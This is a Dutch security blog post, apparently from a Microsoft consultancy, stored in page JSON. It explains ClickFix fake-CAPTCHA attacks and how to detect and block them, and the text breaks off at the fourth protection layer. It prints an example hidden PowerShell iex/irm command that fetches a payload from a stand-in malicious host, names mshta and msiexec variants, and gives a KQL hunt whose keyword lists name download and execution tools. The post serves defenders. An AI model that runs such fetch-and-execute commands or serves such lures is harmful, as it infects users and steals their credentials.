[{"data":1,"prerenderedAt":1127},["ShallowReactive",2],{"sc:header-data-nl":3,"sc:footer-data-nl":489,"author-nl-nadine-kern-166cee5a31dd89":519,"content-nl-nadine-kern":550,"content-events-nl-nadine-kern":1112,"authors_data:Fritz Zurhorst|Nadine Klein":1113},{"lang":4,"home":5,"navigation":17,"meta":479,"contact":485},"de",{"name":6,"folderSwitch":7,"imgLight":10,"img":11,"languages":12},"home",[8,9],"authors","blog","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"nl":13},{"title":14,"url":15,"alt":16},"Home","/nl","glueckkanja Logo",[18,127,231,316,395,402],{"name":19,"languages":20,"children":24},"workplace",{"nl":21},{"title":22,"description":23},"Workplace","Slimme, veilige en flexibele werkplekken op basis van Microsoft 365, waarin moderne technologie en identiteitsdiensten samenkomen.",[25,55,91],{"name":26,"languages":27,"children":30},"portfolio",{"nl":28},{"title":29},"Portfolio",[31,37,43,49],{"name":32,"languages":33},"managed-intune",{"nl":34},{"title":35,"url":36},"Managed Intune","/nl/entra-intune/managed-intune",{"name":38,"languages":39},"managed-entra",{"nl":40},{"title":41,"url":42},"Managed Entra","/nl/entra-intune/managed-entra",{"name":44,"languages":45},"managed-workplace",{"nl":46},{"title":47,"url":48},"Managed Workplace","/nl/workplace/managed-workplace",{"name":50,"languages":51},"consulting-services",{"nl":52},{"title":53,"url":54},"Consulting Services","/nl/workplace/consulting-services",{"name":56,"languages":57,"children":60},"microsoft-365-endpoint",{"nl":58},{"title":59},"Microsoft 365 Endpoint",[61,67,73,79,85],{"name":62,"languages":63},"microsoft-entra-suite",{"nl":64},{"title":65,"url":66},"Microsoft Entra Suite","/nl/workplace/microsoft-entra-suite",{"name":68,"languages":69},"microsoft-intune",{"nl":70},{"title":71,"url":72},"Microsoft Intune","/nl/workplace/microsoft-intune",{"name":74,"languages":75},"microsoft-windows",{"nl":76},{"title":77,"url":78},"Microsoft Windows","/nl/workplace/microsoft-windows",{"name":80,"languages":81},"windows-365-cloud-pc",{"nl":82},{"title":83,"url":84},"Windows 365 Cloud PC","/nl/workplace/windows365-cloud-pc",{"name":86,"languages":87},"cloud-workplace-foundation",{"nl":88},{"title":89,"url":90},"Cloud Workplace Foundation","/nl/workplace/cloud-workplace-foundation",{"name":92,"languages":93,"children":96},"microsoft-365-collaboration",{"nl":94},{"title":95},"Microsoft 365 Collaboration",[97,103,109,115,121],{"name":98,"languages":99},"microsoft-copilot",{"nl":100},{"title":101,"url":102},"Microsoft 365 Copilot","/nl/workplace/microsoft-365-copilot",{"name":104,"languages":105},"microsoft-teams",{"nl":106},{"title":107,"url":108},"Teams","/nl/workplace/microsoft-teams",{"name":110,"languages":111},"sharepoint-powerplatform",{"nl":112},{"title":113,"url":114},"SharePoint & Power Platform","/nl/workplace/sharepoint-power-platform",{"name":116,"languages":117},"exchange-online",{"nl":118},{"title":119,"url":120},"Exchange Online","/nl/workplace/exchange-online",{"name":122,"languages":123},"information-protection-compliance",{"nl":124},{"title":125,"url":126},"Information Protection & Compliance","/nl/workplace/information-protection-compliance",{"name":128,"languages":129,"children":133},"azure",{"nl":130},{"title":131,"description":132},"Azure","Groeien met Azure: lagere cloudkosten, meer efficiëntie en ruimte voor innovatie met IaaS en PaaS.",[134,151,181],{"name":135,"languages":136,"children":138},"azure-portfolio",{"nl":137},{"title":29},[139,145],{"name":140,"languages":141},"azure-managed-services",{"nl":142},{"title":143,"url":144},"Azure Managed Services","/nl/azure/azure-managed-services",{"name":146,"languages":147},"azure-consulting",{"nl":148},{"title":149,"url":150},"Azure Consulting","/nl/azure/azure-consulting",{"name":152,"languages":153,"children":156},"azure-scenarios",{"nl":154},{"title":155},"Scenario's",[157,163,169,175],{"name":158,"languages":159},"plan-your-cloud",{"nl":160},{"title":161,"url":162},"Plan je cloud","/nl/azure/plan-your-cloud",{"name":164,"languages":165},"migrate-to-the-cloud",{"nl":166},{"title":167,"url":168},"Migreren naar de cloud","/nl/azure/migrate-to-the-cloud",{"name":170,"languages":171},"innovate-your-business",{"nl":172},{"title":173,"url":174},"Vernieuw je business","/nl/azure/innovate-your-business",{"name":176,"languages":177},"vmware-exit",{"nl":178},{"title":179,"url":180},"Herzie je VMware-strategie","/nl/azure/vmware-exit",{"name":182,"languages":183,"children":186},"azure-practices",{"nl":184},{"title":185},"Practices",[187,193,199,202,208,213,219,225],{"name":188,"languages":189},"azure-foundation",{"nl":190},{"title":191,"url":192},"Azure Foundation","/nl/azure/azure-foundation",{"name":194,"languages":195},"azure-ai-foundation",{"nl":196},{"title":197,"url":198},"Azure AI Foundation","/nl/azure/azure-ai-foundation",{"name":86,"languages":200},{"nl":201},{"title":89,"url":90},{"name":203,"languages":204},"azure-data-foundation",{"nl":205},{"title":206,"url":207},"Azure Data Foundation","/nl/azure/azure-data-foundation",{"name":188,"languages":209},{"nl":210},{"title":211,"url":212},"Azure Container Foundation","/nl/azure/azure-container-foundation",{"name":214,"languages":215},"dark-tenant",{"nl":216},{"title":217,"url":218},"Managed Dark Tenant","/nl/azure/managed-dark-tenant",{"name":220,"languages":221},"azure-cloud-adoption-framework",{"nl":222},{"title":223,"url":224},"Cloud Adoption Framework","/nl/azure/cloud-adoption-framework",{"name":226,"languages":227},"azure-cloud-competence-center",{"nl":228},{"title":229,"url":230},"Cloud Competence Center","/nl/azure/cloud-competence-center",{"name":232,"languages":233,"children":242},"security",{"nl":234},{"title":235,"description":236,"emergency":237},"Security","Waakzaam in de cloud met een bekroonde 24/7 managed service, incident response en moderne bescherming van je infrastructuur.",{"text":238,"href":239,"skin":240,"icon":241},"Onder aanval?","/nl/security/are-you-under-attack","primary","emergency",[243,268,289],{"name":244,"children":245},"security-security-consulting",[246,252,256,262],{"name":247,"languages":248},"managed-red-tenant",{"nl":249},{"title":250,"url":251},"Managed Red Tenant","/nl/security/managed-red-tenant",{"name":214,"languages":253},{"nl":254},{"title":255,"url":218},"Dark Tenant",{"name":257,"languages":258},"sentinel-data-lake",{"nl":259},{"title":260,"url":261},"Sentinel Data Lake","/nl/security/sentinel-data-lake",{"name":263,"languages":264},"security-consulting",{"nl":265},{"title":266,"url":267},"Security Consulting","/nl/security/security-consulting",{"name":269,"children":270},"security-cloud-security-operations-center",[271,277,283],{"name":272,"languages":273},"cloud-security-operations-center",{"nl":274},{"title":275,"url":276},"Cloud Security Operations Center","/nl/security/cloud-security-operations-center",{"name":278,"languages":279},"global-secure-access",{"nl":280},{"title":281,"url":282},"Global Secure Access","/nl/security/global-secure-access",{"name":284,"languages":285},"my-work-id",{"nl":286},{"title":287,"url":288},"MyWorkID","/nl/security/my-work-id",{"name":290,"children":291},"security-preventive-services",[292,298,304,310],{"name":293,"languages":294},"preventive-services",{"nl":295},{"title":296,"url":297},"Preventive Services","/nl/security/preventive-services",{"name":299,"languages":300},"data-security-services",{"nl":301},{"title":302,"url":303},"Data Security Service","/nl/security/data-security-service",{"name":305,"languages":306},"security-copilot-agents",{"nl":307},{"title":308,"url":309},"Security Copilot Agents","/nl/security/security-copilot-agents",{"name":311,"languages":312},"nis2",{"nl":313},{"title":314,"url":315},"NIS2 implementeren","/nl/security/red-dark-tenant-nis2",{"name":317,"languages":318,"children":322},"products",{"nl":319},{"title":320,"description":321},"Producten","Companion-producten voor een volledig beveiligde, 100% cloud-native Microsoft-omgeving die samenwerking, netwerkauthenticatie en softwarebeheer versterken.",[323,360],{"name":324,"products":325,"children":326},"lorem ipsum 1",true,[327,336,344,352],{"name":328,"img":329,"target":330,"languages":331},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"nl":332},{"title":333,"url":334,"subtitle":335},"RealmJoin","https://www.realmjoin.com","Softwaredistributie vanuit de cloud",{"name":337,"img":338,"target":330,"languages":339},"scepman","products/scepman/scepman-nav-logo.svg",{"nl":340},{"title":341,"url":342,"subtitle":343},"SCEPman","https://www.scepman.com","Certificaatdistributie vanuit de cloud",{"name":345,"img":346,"target":330,"languages":347},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"nl":348},{"title":349,"url":350,"subtitle":351},"KONNEKT","https://www.konnekt.io","Werk met je lokale Office 365-data",{"name":353,"img":354,"target":330,"languages":355},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"nl":356},{"title":357,"url":358,"subtitle":359},"RealMigrator","https://www.realmigrator.com","Migreer je data van de ene server naar de andere",{"name":361,"products":325,"children":362},"lorem ipsum 2",[363,371,379,387],{"name":364,"img":365,"target":330,"languages":366},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"nl":367},{"title":368,"url":369,"subtitle":370},"TerraProvider","https://www.terraprovider.com","Terraform Provider voor Microsoft 365",{"name":372,"img":373,"target":330,"languages":374},"radiusaas","products/radius/radius-nav-logo.svg",{"nl":375},{"title":376,"url":377,"subtitle":378},"RADIUSaaS","https://www.radius-as-a-service.com","Authenticatie voor je netwerk",{"name":380,"img":381,"target":330,"languages":382},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"nl":383},{"title":384,"url":385,"subtitle":386},"Unified Contacts","https://www.unified-contacts.com","Contacten vinden in Microsoft Teams",{"name":388,"img":389,"target":330,"languages":390},"autopilotmonitor","products/autopilot-monitor/AutopilotMonitor-nav-logo.svg",{"nl":391},{"title":392,"url":393,"subtitle":394},"Autopilot Monitor","https://www.autopilotmonitor.com","Windows Autopilot-monitoring in realtime",{"name":396,"languages":397},"casestudies",{"nl":398},{"title":399,"url":400,"description":401},"Case studies","/nl/casestudies","Pionier in de cloud: je Microsoft-partner voor doordachte cloudoplossingen met een blueprint-gebaseerde aanpak en expertise in Infrastructure-as-Code.",{"name":403,"languages":404,"children":407},"company",{"nl":405},{"title":406,"description":401},"Bedrijf",[408,438,462],{"name":409,"languages":410,"children":413},"company-about-us",{"nl":411},{"title":412},"Over ons",[414,420,426,432],{"name":415,"languages":416},"company-facts-figures",{"nl":417},{"title":418,"url":419},"Facts & Figures","/nl/company/facts-and-figures",{"name":421,"languages":422},"company-contact",{"nl":423},{"title":424,"url":425},"Contact & locaties","/nl/company/contact-and-locations",{"name":427,"languages":428},"switzerland",{"nl":429},{"title":430,"url":431}," glueckkanja Zwitserland","/nl/company/switzerland",{"name":433,"languages":434},"austria",{"nl":435},{"title":436,"url":437},"glueckkanja Oostenrijk","/nl/company/austria",{"name":439,"languages":440,"children":443},"company-career",{"nl":441},{"title":442},"Carrière",[444,450,456],{"name":445,"languages":446},"company-career-overview",{"nl":447},{"title":448,"url":449},"Carrière-overzicht","/nl/career",{"name":451,"languages":452},"company-young-professionals",{"nl":453},{"title":454,"url":455},"Young Professionals","/nl/young-professionals",{"name":457,"languages":458},"company-jobs",{"nl":459},{"title":460,"url":461},"Vacatures","/nl/job-offers",{"name":463,"languages":464,"children":467},"company-latest",{"nl":465},{"title":466},"Actueel",[468,474],{"name":469,"languages":470},"company-blog",{"nl":471},{"title":472,"url":473},"Blog","/nl/blog",{"name":469,"languages":475},{"nl":476},{"title":477,"url":478},"Events","/nl/events",[480],{"name":481,"languages":482},"career-meta",{"nl":483},{"title":442,"url":449,"active":484},false,{"languages":486},{"nl":487},{"title":488,"url":425,"active":484},"Contact",{"data":490},{"bgColor":491,"number":492,"mail":493,"brandLogos":494,"logos":495,"links":499,"linksNl":509},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[496],{"img":10,"alt":16,"url":497,"class":498},"index.html","max-w-19rem",[500,503,506],{"title":501,"url":502},"Datenschutz","/de/privacy",{"title":504,"url":505},"Impressum","/de/imprint",{"title":507,"url":508},"No Cookies","/de/cookies",[510,513,516],{"title":511,"url":512},"Privacy","/nl/privacy",{"title":514,"url":515},"Juridische informatie","/nl/imprint",{"title":517,"url":518},"Geen cookies","/nl/cookies",{"id":520,"title":521,"body":522,"description":528,"extension":533,"meta":534,"name":535,"navigation":325,"otherLanguages":536,"path":546,"seo":547,"stem":548,"__hash__":549},"authors/nadine-kern.md","Nadine Kern",{"type":523,"value":524,"toc":529},"minimal",[525],[526,527,528],"p",{},"Nadine Klein arbeitet als Cloud Architect im Bereich Security. Sie berät Kunden bei der Planung und Umsetzung der Microsoft 365 Defender Produkte. Außerdem betreut sie unsere Kunden im Cloud Security Operations Center und ist Teil unseres APT Repsonse Teams bei kompromittierten oder verschlüsselten Kundenumgebungen.",{"title":530,"searchDepth":531,"depth":531,"links":532},"",2,[],"md",{},"Nadine Klein",{"en":537,"es":538,"sv":539,"fi":540,"da":541,"ko":542,"nl":543,"no":544,"ja":545},"Nadine Klein works as a Cloud Architect in the area of Security. She advises customers on the planning and implementation of Microsoft 365 Defender products. She also supports our customers in the Cloud Security Operations Center and is part of our APT Repsonse team for compromised or encrypted customer environments.","Nadine Klein trabaja como Cloud Architect en el ámbito de Security. Asesora a los clientes en la planificación e implementación de los productos Microsoft 365 Defender. Además, atiende a nuestros clientes en el Cloud Security Operations Center y forma parte de nuestro APT Response Team en entornos de clientes comprometidos o cifrados.","Nadine Klein arbetar som Cloud Architect inom området Security. Hon rådgiver kunder vid planering och genomförande av Microsoft 365 Defender-produkterna. Dessutom betjänar hon våra kunder i Cloud Security Operations Center och ingår i vårt APT Response Team vid komprometterade eller krypterade kundmiljöer.","Nadine Klein työskentelee Cloud Architectina Security-alueella. Hän neuvoo asiakkaita Microsoft 365 Defender -tuotteiden suunnittelussa ja käyttöönotossa. Lisäksi hän palvelee asiakkaitamme Cloud Security Operations Centerissä ja on osa APT Response Team -tiimiämme vaarantuneissa tai salatuissa asiakasympäristöissä.","Nadine Klein arbejder som Cloud Architect inden for området Security. Hun rådgiver kunder om planlægning og implementering af Microsoft 365 Defender-produkterne. Desuden betjener hun vores kunder i Cloud Security Operations Center og er en del af vores APT Response Team ved kompromitterede eller krypterede kundemiljøer.","Nadine Klein은 Security 분야의 Cloud Architect로 일하고 있습니다. 그녀는 Microsoft 365 Defender 제품의 계획 및 구현과 관련하여 고객에게 자문을 제공합니다. 또한 Cloud Security Operations Center에서 고객을 지원하며, 침해되었거나 암호화된 고객 환경에 대응하는 APT Response Team의 일원이기도 합니다.","Nadine Klein werkt als Cloud Architect op het gebied van security. Ze adviseert klanten bij de planning en implementatie van de Microsoft 365 Defender producten. Daarnaast begeleidt ze onze klanten in het Cloud Security Operations Center en is ze onderdeel van ons APT Response Team bij gecompromitteerde of versleutelde klantomgevingen.","Nadine Klein jobber som Cloud Architect innen security. Hun rådgir kunder ved planlegging og implementering av Microsoft 365 Defender-produktene. I tillegg følger hun opp kundene våre i Cloud Security Operations Center og er en del av APT Response-teamet vårt ved kompromitterte eller krypterte kundemiljøer.","Nadine KleinはSecurity領域のCloud Architectです。Microsoft 365 Defender製品の計画と導入についてお客様を支援しています。さらに、Cloud Security Operations Centerで当社のお客様を担当し、侵害されたり暗号化されたりしたお客様環境に対応するAPT Response Teamの一員でもあります。","/nadine-kern",{"title":521,"description":528},"nadine-kern","56qh4Ybfi7H4W9Itn4ADcyI2MJdu50TKarjr_ArknXo",[551],{"id":552,"title":553,"author":554,"body":556,"cta":494,"description":530,"eventid":494,"extension":533,"hideInRecent":484,"layout":1065,"meta":1066,"moment":1070,"navigation":325,"path":1104,"seo":1105,"stem":1106,"tags":1107,"webcast":484,"__hash__":1111},"content_nl/posts/2026-09-21-clickfix-prevent-detect.md","ClickFix. Als de gebruiker de exploit is, en hoe jullie dat stoppen",[555,535],"Fritz Zurhorst",{"type":523,"value":557,"toc":1054},[558,563,566,569,576,584,587,593,596,615,626,632,638,641,645,647,650,653,657,659,662,676,680,682,689,768,785,788,792,794,797,812,815,818,822,824,827,830,855,859,861,864,871,875,877,880,906,909,912,915,1014,1017,1020,1023,1034,1037,1041,1043,1050],[559,560,562],"h2",{"id":561},"de-clickfix-aanvalsketen","De ClickFix-aanvalsketen",[526,564,565],{},"{: .h3-font-size}",[526,567,568],{},"ClickFix is een aanval waarbij gebruikers hun eigen aanvaller worden. Geen exploit, geen kwetsbaarheid. Het slachtoffer voert de schadelijke code zelf uit, met één enkele copy-paste.",[526,570,571],{},[572,573],"img",{"alt":574,"src":575},"ClickFix-aanvalsketen in vijf stappen: het lokaas, de truc, copy-paste, uitvoering, infectie.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/click-fix-img-01.png",[526,577,578,579,583],{},"Het lokaas is social engineering: een vals CAPTCHA op een kwaadaardige pagina, een onjuiste supportmelding (\"je browser heeft een update nodig\"), een phishingmail of een valse meetingpagina. Terwijl het slachtoffer op de pagina is, schrijft JavaScript de payload via ",[580,581,582],"code",{},"clipboard.writeText()"," naar het klembord. Dan vraagt de pagina de gebruiker om Win+R, Ctrl+V en Enter te drukken. Het dialoogvenster Uitvoeren start wat er op het klembord staat.",[526,585,586],{},"Een typisch lokaas ziet er zo uit:",[526,588,589],{},[572,590],{"alt":591,"src":592},"Screenshot van een vals CAPTCHA-lokaas dat de gebruiker vraagt Win en X te drukken, dan te plakken en met Enter een commando uit te voeren.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-02.png",[526,594,595],{},"Het commando dat het op het klembord zet, ziet er zo uit:",[597,598,600],"div",{"style":599},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[601,602,606],"pre",{"className":603,"code":604,"language":605,"meta":530,"style":530},"language-powershell shiki shiki-themes github-light github-dark","powershell.exe -w h iex(irm 'https://malicious[.]tld/payload' -UseBasicParsing)\n","powershell",[580,607,608],{"__ignoreMap":530},[609,610,613],"span",{"class":611,"line":612},"line",1,[609,614,604],{},[526,616,617,618,621,622,625],{},"Er gebeuren twee dingen tegelijk. PowerShell start in een verborgen venster (",[580,619,620],{},"-w h","), en ",[580,623,624],{},"iex(irm …)"," laadt de payload en voert die direct in het geheugen uit. Niets landt op de schijf, signatuurgebaseerde antivirus heeft dus niets om te scannen. De tweede stap is meestal een infostealer (Lumma, Vidar, RedLine, StealC), een remote access trojan of een ransomware-loader.",[526,627,628,629,631],{},"Hetzelfde patroon in de Microsoft-Defender-telemetrie, een verborgen PowerShell, gestart vanuit Windows Terminal, dat ",[580,630,624],{}," uitvoert:",[526,633,634],{},[572,635],{"alt":636,"src":637},"Microsoft-Defender-inspect-record met de procesketen WindowsTerminal.exe naar pwsh.exe naar powershell.exe, die een iex(irm …)-commando uitvoert.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-03.png",[526,639,640],{},"Waarom dit zo goed werkt: alles draait in de gebruikerscontext, zonder verhoogde rechten. Cookies, opgeslagen wachtwoorden en sessietokens liggen binnen bereik van een standaardgebruiker. De aanvaller hoeft geen rechten te escaleren om bij dat te komen waarvoor hij is gekomen.",[559,642,644],{"id":643},"wat-microsoft-defender-detecteert","Wat Microsoft Defender detecteert",[526,646,565],{},[526,648,649],{},"Microsoft heeft de afgelopen maanden veel in de ClickFix-detectie geïnvesteerd. Als jullie Defender gezond en juist geconfigureerd is, krijgen jullie native detecties voor ClickFix-payloads. Sinds Q2 2025 publiceert MDE gedragsgebaseerde alerts onder titels als \"Suspicious 'ClickFix' behavior detected\", \"Malicious PowerShell command executed via Run dialog\" of \"An active 'Pacalau' malware in a command line was prevented from executing\". Ze vuren vanuit de MDE-cloud-engine via de analyse van de procesketen, parallel aan de AV-detectie en vaak een paar seconden eerder.",[526,651,652],{},"De configuratie die dat mogelijk maakt, staat verder naar onderen bij de hardening van de uitvoering.",[559,654,656],{"id":655},"waar-de-native-detectie-tegen-haar-grenzen-aanloopt","Waar de native detectie tegen haar grenzen aanloopt",[526,658,565],{},[526,660,661],{},"Cloudgebaseerde ML-signaturen hebben tijd nodig voordat ze afgaan. We zien regelmatig een gat van meer dan een minuut tussen de PowerShell-start en de Defender-alert. Een snellere payload glipt door dat venster.",[526,663,664,665,667,668,671,672,675],{},"Aanvallers passen zich bovendien snel aan. Ruil ",[580,666,605],{}," voor ",[580,669,670],{},"mshta http://..."," of ",[580,673,674],{},"msiexec /i http://...",", beide klassieke LOLBins, en de PowerShell-specifieke detecties grijpen niet meer.",[559,677,679],{"id":678},"het-gat-dichten-een-runmru-hunt","Het gat dichten: een RunMRU-hunt",[526,681,565],{},[526,683,684,685,688],{},"Dat gat dichten we met custom detections. Uitgangspunt is een KQL-query op de registry key ",[580,686,687],{},"RunMRU",", die elk commando meeschrijft dat een gebruiker in het Win+R-dialoogvenster typt.",[597,690,691],{"style":599},[601,692,696],{"className":693,"code":694,"language":695,"meta":530,"style":530},"language-kusto shiki shiki-themes github-light github-dark","DeviceRegistryEvents\n| where ActionType =~ \"RegistryValueSet\"\n| where InitiatingProcessFileName =~ \"explorer.exe\"\n| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n| where RegistryValueData has \" ✅ \"\n    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n","kusto",[580,697,698,703,708,714,720,726,732,738,744,750,756,762],{"__ignoreMap":530},[609,699,700],{"class":611,"line":612},[609,701,702],{},"DeviceRegistryEvents\n",[609,704,705],{"class":611,"line":531},[609,706,707],{},"| where ActionType =~ \"RegistryValueSet\"\n",[609,709,711],{"class":611,"line":710},3,[609,712,713],{},"| where InitiatingProcessFileName =~ \"explorer.exe\"\n",[609,715,717],{"class":611,"line":716},4,[609,718,719],{},"| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n",[609,721,723],{"class":611,"line":722},5,[609,724,725],{},"| where RegistryValueData has \" ✅ \"\n",[609,727,729],{"class":611,"line":728},6,[609,730,731],{},"    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n",[609,733,735],{"class":611,"line":734},7,[609,736,737],{},"        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n",[609,739,741],{"class":611,"line":740},8,[609,742,743],{},"    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n",[609,745,747],{"class":611,"line":746},9,[609,748,749],{},"    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n",[609,751,753],{"class":611,"line":752},10,[609,754,755],{},"    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n",[609,757,759],{"class":611,"line":758},11,[609,760,761],{},"        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n",[609,763,765],{"class":611,"line":764},12,[609,766,767],{},"            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n",[526,769,770,771,774,775,774,778,774,781,784],{},"De query markeert elke Win+R-invoer die eruitziet als een ClickFix-commando: PowerShell, mshta, curl of msiexec samen met typische indicatoren als ",[580,772,773],{},"-w hidden",", ",[580,776,777],{},"iex",[580,779,780],{},"irm",[580,782,783],{},"DownloadString"," of Base64-gecodeerde payloads. Ze vangt ook de subtiele trucs. De groene vinkje-emoji die veel valse CAPTCHA-lokazen voor het commando zetten. Unicode-tekens uit cyrillische, Arabische of Thaise bereiken, waarmee aanvallers tekst camoufleren en eenvoudige stringfilters omzeilen. Duikt een van deze patronen op in een Win+R-invoer, dan loopt er zeer waarschijnlijk op dat moment een ClickFix-aanval.",[526,786,787],{},"Voor onze CSOC-klanten draaien we deze en verdere custom detections om het gat tussen nieuwe aanvalstechnieken en de ingebouwde detectie te dichten.",[559,789,791],{"id":790},"beschermingslaag-1-de-bezorging-blokkeren","Beschermingslaag 1: de bezorging blokkeren",[526,793,565],{},[526,795,796],{},"Nu naar de preventie. ClickFix is wijdverbreid en succesvol, één enkele bescherming volstaat dus niet. We werken in lagen, van de bezorging tot de uitvoering.",[526,798,799,800,803,804,807,808,811],{},"Network Protection blokkeert bekende delivery-domains en C2-servers voor alle browsers. MDE Web Content Filtering vult categorieën aan als \"Newly registered domains\", \"Hacking\" en \"Illegal Software\". Network Protection is in Windows ingebouwd, maar voor browsers van derden moeten jullie QUIC en ECH uitschakelen, omdat beide de complete verbinding versleutelen en het doeldomein verbergen. Schakel QUIC in Chrome en Firefox uit via enterprise policy (",[580,801,802],{},"QuicAllowed = Disabled"," in Chrome, ",[580,805,806],{},"network.http.http3.enable = false"," in Firefox); voor ECH zetten jullie in Chrome ",[580,809,810],{},"EncryptedClientHelloEnabled = Disabled",".",[526,813,814],{},"Voor Edge activeren jullie SmartScreen. Voor browsers van derden schakelen jullie hun ingebouwde Safe Browsing aan. Dat is niet hetzelfde als Network Protection, maar helpt bij het filteren van schadelijke pagina's. Voor de mailvector controleren Safe Links en Safe Attachments links en bijlagen voordat gebruikers ermee interacteren.",[526,816,817],{},"Het addertje: dat alles grijpt alleen tegen bekende infrastructuur. Actuele ClickFix-campagnes lopen via vers geregistreerde infrastructuur die te laat wordt geïdentificeerd en geblokkeerd, en soms via legitieme pagina's die een aanvaller heeft gecompromitteerd. Dus kijken we naar wat beschermt nadat het lokaas is bezorgd.",[559,819,821],{"id":820},"beschermingslaag-2-de-truc-blokkeren","Beschermingslaag 2: de truc blokkeren",[526,823,565],{},[526,825,826],{},"Een paar Edge-features verhogen de hindernis terwijl de gebruiker op een kwaadaardige pagina is. Het governen van browserextensies verhindert dat gebruikers kwaadaardige of gecompromitteerde extensies installeren die ClickFix-overlays binnensmokkelen of zelf het klembord manipuleren. De Edge Enhanced Security Mode legt strengere beschermingsmaatregelen op aan onbekende en zelden bezochte pagina's (JIT uitgeschakeld, Control Flow Guard, hardwaregesteunde stackbescherming), wat op exploits gebaseerde browserovernames duidelijk bemoeilijkt. Typo Protection waarschuwt voor typosquatted domains (micros0ft.com, paypa1.com) en blokkeert een wijdverbreide ClickFix-delivery-vector via valse merkdomeinen.",[526,828,829],{},"Technische controls zijn maar de helft van het werk. Voorlichting van gebruikers blijft beslissend. De ene regel die het grootste deel draagt: als een webpagina je vraagt om iets in je computer te plakken, is het een aanval. Maak dat in de awarenesstraining concreet:",[831,832,834,835,834,843,834,849],"ul",{"style":833},"margin: 0.25rem 0","\n  ",[836,837,838,842],"li",{},[839,840,841],"strong",{},"Echt lokaas laten zien:"," valse \"Verify you are human\"-checkboxen, \"je browser heeft een update nodig\", \"het document kon niet worden gerenderd, voer deze fix uit\", kapotte Teams- of Zoom-audioprompts.",[836,844,845,848],{},[839,846,847],{},"De klembordtruc voordoen:"," laten zien hoe de pagina het klembord stil overschrijft.",[836,850,851,854],{},[839,852,853],{},"Melden eenvoudig maken:"," snel en zonder schuldtoewijzing.",[559,856,858],{"id":857},"beschermingslaag-3-de-actie-blokkeren","Beschermingslaag 3: de actie blokkeren",[526,860,565],{},[526,862,863],{},"Hier zijn er een paar mogelijkheden om het systeem te hardenen, geen daarvan is een garantie. Begin met het uitschakelen van het dialoogvenster Uitvoeren, dat verwijdert het Win+R-instappunt. Microsofts ClickFix-guidance raadt aan het uit te schakelen \"where it isn't necessary\". Dat sluit de specifieke Win+R-paste-aanval, maar alternatieve startvlakken blijven, zoals de adresbalk van Explorer en Windows Terminal.",[526,865,866,867,870],{},"Jullie kunnen Edge aanvullend hardenen met ",[580,868,869],{},"DefaultClipboardSetting",", dat verhindert dat JavaScript stil naar het klembord schrijft.",[559,872,874],{"id":873},"beschermingslaag-4-de-uitvoering-blokkeren","Beschermingslaag 4: de uitvoering 